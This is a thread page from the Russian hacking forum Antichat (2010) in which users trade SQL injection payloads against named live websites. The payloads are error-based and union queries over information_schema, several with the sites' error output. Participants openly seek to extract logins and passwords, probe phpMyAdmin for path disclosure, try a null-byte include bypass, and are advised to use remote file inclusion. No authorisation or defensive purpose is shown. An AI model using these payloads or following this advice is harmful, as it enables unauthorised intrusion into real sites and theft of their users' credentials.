ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12501  
Старый 11.04.2010, 18:02
Аватар для [ DSU ]
[ DSU ]
Участник форума
Регистрация: 22.10.2007
Сообщений: 159
Провел на форуме:
721727

Репутация: 397
Отправить сообщение для [ DSU ] с помощью ICQ
По умолчанию

мда
Цитата:
http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10%20and%20%28select%201%2 0from%28select%20count%28*%29,concat%28table_name, floor%28rand%280%29*2%29%29x%20from%20information_ schema.tables%20group%20by%20x%29a%29--
 
Ответить с цитированием

  #12502  
Старый 11.04.2010, 18:03
Аватар для wildshaman
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10+or+(select+count(*)+fro m+information_schema.tables+group+by+concat(table_ name,floor(rand(0)*2)))--

Data truncated for column 'guid' at row 1Duplicate entry 'achievement_reward1' for key 'group_key'

все понел?
 
Ответить с цитированием

  #12503  
Старый 11.04.2010, 18:07
Аватар для [ DSU ]
[ DSU ]
Участник форума
Регистрация: 22.10.2007
Сообщений: 159
Провел на форуме:
721727

Репутация: 397
Отправить сообщение для [ DSU ] с помощью ICQ
По умолчанию

Тоже самое выложил )))
 
Ответить с цитированием

  #12504  
Старый 11.04.2010, 18:07
Аватар для Deani
Deani
Познающий
Регистрация: 09.11.2009
Сообщений: 32
Провел на форуме:
79679

Репутация: 3
По умолчанию

да, спасибо большое !
 
Ответить с цитированием

  #12505  
Старый 11.04.2010, 18:24
Аватар для daniel_1024
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831

Репутация: 34
По умолчанию

как пути на сервере раскрыть ? есть доступ к phpmyadmin
phpmyadmin/phpinfo.php ничего не выводит...
кстати сервер под виндой
 
Ответить с цитированием

  #12506  
Старый 11.04.2010, 18:27
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

кстате /phpmyadmin/scripts/setup.php доступен ли и какая версия phpmyadmin-а
 
Ответить с цитированием

  #12507  
Старый 11.04.2010, 19:00
Аватар для daniel_1024
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831

Репутация: 34
По умолчанию

phpmyadmin 3.2.0.1, сервер Microsoft-IIS/6.0
/phpmyadmin/scripts/setup.php не доступен, этот файл удалён
 
Ответить с цитированием

  #12508  
Старый 11.04.2010, 20:10
Аватар для MastaBass1
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465

Репутация: 0
По умолчанию

Не могу вытащить логины да пароли из слепой скули

http://www.ollis.ru/index.php?rest=1')+AND+1=2+UNION+SELECT+0,1,2,3,4, 5%23

на 6 поле этом вылетает пустая страница.
Знаю что вывод из скули такой:

http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+

Версия:

http://www.ollis.ru/index.php?id=cabinet')+and+(1,2)=(Select*From(Sele ct+Name_Const(version(),1),Name_Const(version(),1) %20)a)%23&type=cabinet&action=lost_pw&mode=return_ from_hidden

Помогите вытащить пароли...нужно срочно....есть хочу=)))

Последний раз редактировалось MastaBass1; 11.04.2010 в 20:12..
 
Ответить с цитированием

  #12509  
Старый 11.04.2010, 22:42
Аватар для kirill1927
kirill1927
Новичок
Регистрация: 12.03.2009
Сообщений: 12
Провел на форуме:
293510

Репутация: 2
По умолчанию

Всем привет
есть массив /bla.php?s=sss
там дописывается инклудинг funtions.php тоесть ссылка получается такая /bla.php?s=sssfuntions.php вставляю %00 => /bla.php?s=sss%00 в ответ
Цитата:
Warning: require_once(sss\0funtions.php) [function.require-once]: failed to open stream: No such file or directory ....
есть ли возможность обойти фильтрацию ?
 
Ответить с цитированием

  #12510  
Старый 11.04.2010, 22:50
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Если RFI, то можешь залить на хостинг файлик functions.php, и проинклудить его.

Стукни мне в асю 674542, или в ПМ кинь сайт, посмотрю.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ